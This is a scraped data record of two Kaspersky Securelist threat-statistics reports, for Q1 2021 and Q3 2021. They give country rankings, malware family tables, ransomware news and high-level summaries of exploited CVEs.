|---|---|---|
| 1 | Afghanistan | 4.65 |
| 2 | Ethiopia | 3.00 |
| 3 | Rwanda | 2.37 |
| 4 | Uzbekistan | 2.23 |
| 5 | Kazakhstan | 1.81 |
| 6 | Sri Lanka | 1.78 |
| 7 | Ukraine | 1.59 |
| 8 | Vietnam | 1.48 |
| 9 | Mozambique | 1.46 |
| 10 | Tanzania | 1.45 |

_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._
_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._

## Vulnerable applications used by cybercriminals during cyber attacks

In Q1 2021, we noted a drop in the share of exploits for vulnerabilities in the Microsoft Office suite, but they still lead the pack with 59%. The most common vulnerability in the suite remains [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), a stack buffer overflow that occurs when processing objects in the Equation Editor component. Exploits for [CVE-2015-2523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2523>) — use-after-free vulnerabilities in Microsoft Excel — and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which we've often written about, were also in demand. Note the age of these vulnerabilities — even the latest of them was discovered almost three years ago. So, once again, we remind you of the importance of regular updates.

The first quarter was rich not only in known exploits, but also in new zero-day vulnerabilities. In particular, the interest of both [infosec experts](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) and cybercriminals was piqued by vulnerabilities in the popular Microsoft Exchange Server:

 * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26855>) — a server-side request forgery vulnerability that allows remote code execution (RCE)
 * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26857>) — an insecure deserialization vulnerability in the Unified Messaging service that can lead to code execution on the server
 * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>) — a post-authorization arbitrary file write vulnerability in Microsoft Exchange, which could also lead to remote code execution
 * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-27065>) — as in the case of [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>), allows an authorized Microsoft Exchange user to write data to an arbitrary file in the system

Found [in the wild](<https://encyclopedia.kaspersky.com/glossary/exploitation-in-the-wild-itw/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), these vulnerabilities were used by APT groups, including as a springboard for ransomware distribution.

During the quarter, vulnerabilities were also identified in Windows itself. In particular, the [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1732>) vulnerability allowing privilege escalation was discovered in the Win32k subsystem. Two other vulnerabilities, [CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1647>) and [CVE-2021-24092](<https://nvd.nist.gov/vuln/detail/CVE-2021-24092>), were found in the Microsoft Defender antivirus engine, allowing elevation of user privileges in the system and execution of potentially dangerous code.

_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111159/09-en-malware-report-q1-2021-pc.png>))_

The second most popular were exploits for browser vulnerabilities (26.12%); their share in Q1 grew by more than 12 p.p. Here, too, there were newcomers: for example, the Internet Explorer script engine was found to contain the [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26411>) vulnerability, which can lead to remote code execution on behalf of the current user through manipulations that corrupt the heap memory. This vulnerability was exploited by the [Lazarus](<https://securelist.ru/tag/lazarus/>) group to download malicious code and infect the system. Several vulnerabilities were discovered in Google Chrome:

 * [CVE-2021-21148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21148>) — heap buffer overflow in the V8 script engine, leading to remote code execution
 * [CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>) — overflow and unsafe reuse of an object in memory when processing audio data, also enabling remote code execution
 * [CVE-2021-21139](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21139>) — bypassing security restrictions when using an iframe

Other interesting findings include a critical vulnerability in VMware vCenter Server, [CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>), which allows remote code execution without any rights. Critical vulnerabilities in the popular SolarWinds Orion Platform — [CVE-2021-25274](<https://nvd.nist.gov/vuln/detail/CVE-2021-25274>), [CVE-2021-25275](<https://nvd.nist.gov/vuln/detail/CVE-2021-25275>) and [CVE-2021-25276](<https://nvd.nist.gov/vuln/detail/CVE-2021-25276>) — caused a major splash in the infosec environment. They gave attackers the ability to infect computers running this software, usually machines inside corporate networks and government institutions. Lastly, the [CVE-2021-21017](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21017>) vulnerability, discovered in Adobe Reader, caused a heap buffer overflow by means of a specially crafted document, giving an attacker the ability to execute code.

Analysis of network threats in Q1 2021 continued to show ongoing attempts to attack servers with a view to brute-forcing passwords for network services such as Microsoft SQL Server, RDP and SMB. Attacks using the popular EternalBlue, EternalRomance and other similar exploits were widespread. Among the most notable new vulnerabilities in this period were bugs in the Windows networking stack code related to handling the IPv4/IPv6 protocols: [CVE-2021-24074](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-24074>), [CVE-2021-24086](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24086>) and [CVE-2021-24094](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>).

## Attacks on macOS

Q1 2021 was also rich in macOS-related news. Center-stage were cybercriminals who took pains to modify their [malware for the newly released MacBooks with M1 processors](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>). Updated adware for the new Macs also immediately appeared, in particular the [Pirrit family](<https://objective-see.com/blog/blog_0x62.html>) (whose members placed high in our Top 20 threats for macOS).
In addition, we detected an interesting adware program written in the Rust language, and assigned it the verdict [AdWare.OSX.Convuster.a](<https://securelist.ru/convuster-macos-adware-in-rust/100859/>).

**Top 20 threats for macOS**

| | Verdict | %* |
|---|---|---|
| 1 | AdWare.OSX.Pirrit.ac | 18.01 |
| 2 | AdWare.OSX.Pirrit.j | 12.69 |
| 3 | AdWare.OSX.Pirrit.o | 8.42 |
| 4 | AdWare.OSX.Bnodlero.at | 8.36 |
| 5 | Monitor.OSX.HistGrabber.b | 8.06 |
| 6 | AdWare.OSX.Pirrit.gen | 7.95 |
| 7 | Trojan-Downloader.OSX.Shlayer.a | 7.90 |
| 8 | AdWare.OSX.Cimpli.m | 6.17 |
| 9 | AdWare.OSX.Pirrit.aa | 6.05 |
| 10 | Backdoor.OSX.Agent.z | 5.27 |
| 11 | Trojan-Downloader.OSX.Agent.h | 5.09 |
| 12 | AdWare.OSX.Bnodlero.bg | 4.60 |
| 13 | AdWare.OSX.Ketin.h | 4.02 |
| 14 | AdWare.OSX.Bnodlero.bc | 3.87 |
| 15 | AdWare.OSX.Bnodlero.t | 3.84 |
| 16 | AdWare.OSX.Cimpli.l | 3.75 |
| 17 | Trojan-Downloader.OSX.Lador.a | 3.61 |
| 18 | AdWare.OSX.Cimpli.k | 3.48 |
| 19 | AdWare.OSX.Ketin.m | 2.98 |
| 20 | AdWare.OSX.Bnodlero.ay | 2.94 |

_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._

Traditionally, most of the Top 20 threats for macOS are adware programs: 15 in Q1. In the list of malicious programs, Trojan-Downloader.OSX.Shlayer.a (7.90%) maintained its popularity. Incidentally, this Trojan's task is to download adware from the Pirrit and Bnodlero families. But we also saw the reverse, when a member of the AdWare.OSX.Pirrit family dropped Backdoor.OSX.Agent.z into the system.

### Threat geography

_Geography of threats for macOS, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111228/10-en-malware-report-q1-2021-pc.png>))_

**Top 10 countries by share of attacked users**

| | Country* | %** |
|---|---|---|
| 1 | France | 4.62 |
| 2 | Spain | 4.43 |
| 3 | Italy | 4.36 |
| 4 | India | 4.11 |
| 5 | Canada | 3.59 |
| 6 | Mexico | 3.55 |
| 7 | Russia | 3.21 |
| 8 | Brazil | 3.18 |
| 9 | Great Britain | 2.96 |
| 10 | USA | 2.94 |

_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._
_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._

In Q1 2021, Europe accounted for the Top 3 countries by share of attacked macOS users: France (4.62%), Spain (4.43%) and Italy (4.36%). The most common threats in all three were adware apps from the Pirrit family.

## IoT attacks

### IoT threat statistics

In Q1 2021, most of the devices that attacked Kaspersky traps did so using the Telnet protocol. A third of the attacking devices attempted to [brute-force](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) our SSH traps.

| Service | % |
|---|---|
| Telnet | 69.48% |
| SSH | 30.52% |

_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2021_

The statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.

| Service | % |
|---|---|
| Telnet | 77.81% |
| SSH | 22.19% |

_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2021_

_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111259/11-en-malware-report-q1-2021-pc.png>))_

**Top 10 countries by location of devices from which attacks were carried out on Kaspersky Telnet traps**

| | Country | %* |
|---|---|---|
| 1 | China | 33.40 |
| 2 | India | 13.65 |
| 3 | USA | 11.56 |
| 4 | Russia | 4.96 |
| 5 | Montenegro | 4.20 |
| 6 | Brazil | 4.19 |
| 7 | Taiwan, Province of China | 2.32 |
| 8 | Iran | 1.85 |
| 9 | Egypt | 1.84 |
| 10 | Vietnam | 1.73 |

_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._

### SSH-based attacks

_Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111335/12-en-malware-report-q1-2021-pc.png>))_

**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps**

| | Country | %* |
|---|---|---|
| 1 | USA | 24.09 |
| 2 | China | 19.89 |
| 3 | Hong Kong | 6.38 |
| 4 | South Korea | 4.37 |
| 5 | Germany | 4.06 |
| 6 | Brazil | 3.74 |
| 7 | Russia | 3.05 |
| 8 | Taiwan, Province of China | 2.80 |
| 9 | France | 2.59 |
| 10 | India | 2.36 |

_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._

### Threats loaded into traps

| | Verdict | %* |
|---|---|---|
| 1 | Backdoor.Linux.Mirai.b | 50.50% |
| 2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26% |
| 3 | Backdoor.Linux.Gafgyt.a | 3.01% |
| 4 | HEUR:Trojan-Downloader.Shell.Agent.bc | 2.72% |
| 5 | Backdoor.Linux.Mirai.a | 2.72% |
| 6 | Backdoor.Linux.Mirai.ba | 2.67% |
| 7 | Backdoor.Linux.Agent.bc | 2.37% |
| 8 | Trojan-Downloader.Shell.Agent.p | 1.37% |
| 9 | Backdoor.Linux.Gafgyt.bj | 0.78% |
| 10 | Trojan-Downloader.Linux.Mirai.d | 0.66% |

_* Share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._

## Attacks via web resources

_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._

### Countries that are sources of web-based attacks: Top 10

_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._

_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._

In Q1 2021, Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources located across the globe. 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus.

_Distribution of web attack sources by country, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111405/13-en-malware-report-q1-2021-pc.png>))_

### Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious objects that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

| | Country* | % of attacked users** |
|---|---|---|
| 1 | Belarus | 15.81 |
| 2 | Ukraine | 13.60 |
| 3 | Moldova | 13.16 |
| 4 | Kyrgyzstan | 11.78 |
| 5 | Latvia | 11.38 |
| 6 | Algeria | 11.16 |
| 7 | Russia | 11.11 |
| 8 | Mauritania | 11.08 |
| 9 | Kazakhstan | 10.62 |
| 10 | Tajikistan | 10.60 |
| 11 | Uzbekistan | 10.39 |
| 12 | Estonia | 10.20 |
| 13 | Armenia | 9.44 |
| 14 | Mongolia | 9.36 |
| 15 | France | 9.35 |
| 16 | Greece | 9.04 |
| 17 | Azerbaijan | 8.57 |
| 18 | Madagascar | 8.56 |
| 19 | Morocco | 8.55 |
| 20 | Lithuania | 8.53 |

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._

_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._

On average, 7.67% of Internet user computers worldwide experienced at least one **Malware-class** attack.

_Geography of web-based malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111435/14-en-malware-report-q1-2021-pc.png>))_

## Local threats

_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._

In Q1 2021, our File Anti-Virus detected **77,415,192** malicious and potentially unwanted objects.

### Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period.
These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 47.71 \n2 | Turkmenistan | 43.39 \n3 | Ethiopia | 41.03 \n4 | Tajikistan | 38.96 \n5 | Bangladesh | 36.21 \n6 | Algeria | 35.49 \n7 | Myanmar | 35.16 \n8 | Uzbekistan | 34.95 \n9 | South Sudan | 34.17 \n10 | Benin | 34.08 \n11 | China | 33.34 \n12 | Iraq | 33.14 \n13 | Laos | 32.84 \n14 | Burkina Faso | 32.61 \n15 | Mali | 32.42 \n16 | Guinea | 32.40 \n17 | Yemen | 32.32 \n18 | Mauritania | 32.22 \n19 | Burundi | 31.68 \n20 | Sudan | 31.61 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111505/15-en-malware-report-q1-2021-pc.png>))_\n\nOverall, 15.05% of user computers globally faced at least one **Malware-class** local threat during Q1.", "cvss3": {}, "published": "2021-05-31T10:00:05", "type": "securelist", "title": "IT threat evolution Q1 2021. 
Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-2523", "CVE-2017-11882", "CVE-2018-0802", "CVE-2021-1647", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21139", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21972", "CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24092", "CVE-2021-24094", "CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-31T10:00:05", "id": "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "href": "https://securelist.com/it-threat-evolution-q1-2021-non-mobile-statistics/102425/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T12:37:38", "description": "\n\n * [IT threat evolution Q3 2021](<https://securelist.com/it-threat-evolution-q3-2021/104876/>)\n * **IT threat evolution in Q3 2021. PC statistics**\n * [IT threat evolution in Q3 2021. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-mobile-statistics/105020/>)\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q3 2021:\n\n * Kaspersky solutions blocked 1,098,968,315 attacks from online resources across the globe.\n * Web Anti-Virus recognized 289,196,912 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 104,257 unique users.\n * Ransomware attacks were defeated on the computers of 108,323 unique users.\n * Our File Anti-Virus detected 62,577,326 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q3 2021, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 104,257 unique users.\n\n_Number of unique users attacked by financial malware, 
Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150303/01-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Geography of financial malware attacks**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150355/02-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 5.4 \n2 | Tajikistan | 3.7 \n3 | Afghanistan | 3.5 \n4 | Uzbekistan | 3.0 \n5 | Yemen | 1.9 \n6 | Kazakhstan | 1.6 \n7 | Paraguay | 1.6 \n8 | Sudan | 1.6 \n9 | Zimbabwe | 1.4 \n10 | Belarus | 1.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 17.7 \n2 | SpyEye | Trojan-Spy.Win32.SpyEye | 17.5 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 9.6 \n4 | Trickster | Trojan.Win32.Trickster | 4.5 \n5 | RTM | Trojan-Banker.Win32.RTM | 3.6 \n6 | Nimnul | Virus.Win32.Nimnul | 3.0 \n7 | Gozi | Trojan-Banker.Win32.Gozi | 2.7 \n8 | Danabot | Trojan-Banker.Win32.Danabot | 2.4 \n9 | Tinba | Trojan-Banker.Win32.Tinba | 1.5 \n10 | Cridex | Backdoor.Win32.Cridex | 1.3 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\nIn Q3, the family ZeuS/Zbot (17.7%), as usual, became the most widespread family of bankers. 
Next came the SpyEye family (17.5%), whose share doubled from 8.8% in the previous quarter. The Top 3 was rounded out by the CliptoShuffler family (9.6%), down one position and just 0.3 p.p. The families Trojan-Banker.Win32.Gozi (2.7%) and Trojan-Banker.Win32.Tinba (1.5%) made it back into the Top 10 in Q3, in seventh and ninth place, respectively.\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Attack on Kaseya and the REvil story\n\nIn early July, the REvil/Sodinokibi group [attempted an attack](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) on the Kaseya VSA remote administration software, compromising several managed service providers (MSPs) that used it. Through this supply-chain attack, the attackers were able to infect over one thousand client businesses of the compromised MSPs. REvil's original $70 million ransom demand for decrypting all victims of the attack was soon lowered to $50 million.\n\nFollowing this massive attack, law enforcement agencies stepped up their attention to REvil, and by mid-July the gang shut down its Trojan infrastructure, suspended new infections and dropped out of sight. Meanwhile, Kaseya obtained a universal decryptor for everyone affected by the attack. [According to](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-August-4th-2021>) Kaseya, it "did not pay a ransom \u2014 either directly or indirectly through a third party". Later [it emerged](<https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html>) that the company got the decryptor and the key from the FBI.\n\nBut by the first half of September, REvil was up and running again. 
[According to](<https://www.bleepingcomputer.com/news/security/revil-ransomware-is-back-in-full-attack-mode-and-leaking-data/>) the hacking forum XSS, the group's former public representative known as UNKN "disappeared", and the malware developers, failing to find him, waited awhile and restored the Trojan infrastructure from backups.\n\n#### The arrival of BlackMatter: DarkSide restored?\n\nAs we already wrote in our Q2 report, the group DarkSide folded its operations after their "too high-profile" attack on Colonial Pipeline. And now there is a "new" arrival known as BlackMatter, which, as its members [claim](<https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil>), represents the "best" of DarkSide, REvil and LockBit.\n\nFrom our analysis of the BlackMatter Trojan's executable we conclude that most likely it was built using DarkSide's source codes.\n\n#### Q3 closures\n\n * Europol and the Ukrainian police have [arrested](<https://www.europol.europa.eu/newsroom/news/ransomware-gang-arrested-in-ukraine-europol's-support>) two members of an unnamed ransomware gang. The only detail made known is that the ransom demands amounted to \u20ac5 to \u20ac70 million.\n * Following its attack on Washington DC's Metropolitan Police Department, the group Babuk folded (or just suspended) its operations and published an archive containing the Trojan's source code, build tools and keys for some of the victims.\n * At the end of August, Ragnarok (not to be confused with RagnarLocker) suddenly called it a day, deleted all their victims' info from their portal and published the master key for decryption. 
The group gave no reasons for this course of action.\n\n#### Exploitation of vulnerabilities and new attack methods\n\n * The HelloKitty group distributed its ransomware by exploiting the vulnerability CVE-2019-7481 in SonicWall gateways.\n * Magniber and Vice Society penetrated target systems by exploiting vulnerabilities from the PrintNightmare family (CVE-2021-1675, CVE-2021-34527, CVE-2021-36958).\n * The LockFile group exploited the ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) to penetrate the victim's network; for lateral movement it relied on the new PetitPotam attack to gain control of the domain controller.\n * The Conti group also used ProxyShell exploits in its attacks.\n\n### Number of new ransomware modifications\n\nIn Q3 2021, we detected 11 new ransomware families and 2,486 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q3 2020 \u2014 Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150433/03-en-ru-es-malware-report-q3-2021-pc-graphs.png>))_\n\n## Number of users attacked by ransomware Trojans\n\nIn Q3 2021, Kaspersky products and technologies protected 108,323 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150459/04-en-malware-report-q3-2021-pc-graphs.png>))_\n\n## Geography of ransomware attacks\n\n_Geography of attacks by ransomware Trojans, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150535/05-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.98 \n2 | Uzbekistan | 0.59 \n3 | Bolivia | 0.55 \n4 | Pakistan | 0.52 \n5 | Myanmar | 0.51 \n6 | China | 0.51 \n7 | Mozambique | 0.51 \n8 | Nepal | 0.48 \n9 | Indonesia | 0.47 
\n10 | Egypt | 0.45 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n## Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 27.67% \n2 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 17.37% \n3 | WannaCry | Trojan-Ransom.Win32.Wanna | 11.84% \n4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 7.78% \n5 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.58% \n6 | (generic verdict) | Trojan-Ransom.Win32.Phny | 5.57% \n7 | PolyRansom/VirLock | Virus.Win32.Polyransom / Trojan-Ransom.Win32.PolyRansom | 2.65% \n8 | (generic verdict) | Trojan-Ransom.Win32.Agent | 2.04% \n9 | (generic verdict) | Trojan-Ransom.MSIL.Encoder | 1.07% \n10 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 1.04% \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q3 2021, Kaspersky solutions detected 46,097 new modifications of miners.\n\n_Number of new miner modifications, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150605/06-en-malware-report-q3-2021-pc-graphs.png>))_\n\n### Number of users attacked by miners\n\nIn Q3, we detected attacks using miners on the computers of 322,131 unique users of Kaspersky products worldwide. And while during Q2 the number of attacked users gradually decreased, the trend was reversed in July and August 2021. 
With slightly over 140,000 unique users attacked by miners in July, the number of potential victims almost reached 150,000 in September.\n\n_Number of unique users attacked by miners, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150635/07-en-malware-report-q3-2021-pc-graphs.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150710/08-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Ethiopia | 2.41 \n2 | Rwanda | 2.26 \n3 | Myanmar | 2.22 \n4 | Uzbekistan | 1.61 \n5 | Ecuador | 1.47 \n6 | Pakistan | 1.43 \n7 | Tanzania | 1.40 \n8 | Mozambique | 1.34 \n9 | Kazakhstan | 1.34 \n10 | Azerbaijan | 1.27 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\n### Quarter highlights\n\nQ3 was dominated by a whole new family of vulnerabilities in the Microsoft Windows print spooler subsystem, already known in the media as PrintNightmare: [CVE-2021-1640](<https://nvd.nist.gov/vuln/detail/CVE-2021-1640>), [CVE-2021-26878](<https://nvd.nist.gov/vuln/detail/CVE-2021-26878>), [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), [CVE-2021-36936](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36936>), [CVE-2021-36947](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36947>), [CVE-2021-34483](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34483>). 
All of these vulnerabilities allow local privilege escalation or remote execution of commands with SYSTEM rights, and because they require next to nothing to exploit, they are often used by popular mass-infection tools. Fixing them requires several Microsoft patches.\n\nThe vulnerability known as PetitPotam proved no less troublesome. It allows an unprivileged user to take control of a Windows domain computer, or even a domain controller, provided Active Directory Certificate Services (AD CS) is present and active.\n\nIn the newest OS, Windows 11, even before its official release, the vulnerability [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>) was detected and dubbed HiveNightmare/SeriousSam. It allows an unprivileged user to copy all the registry hives, including SAM, via the volume shadow copy mechanism, potentially exposing password hashes and other critical data.\n\nIn Q3, attackers greatly favored exploits targeting the ProxyShell, ProxyToken and ProxyOracle vulnerabilities ([CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>), [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>), [CVE-2021-33766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>), [CVE-2021-31195](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31195>), [CVE-2021-31196](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31196>)). Exploited in combination, these give full control of mail servers running Microsoft Exchange Server. 
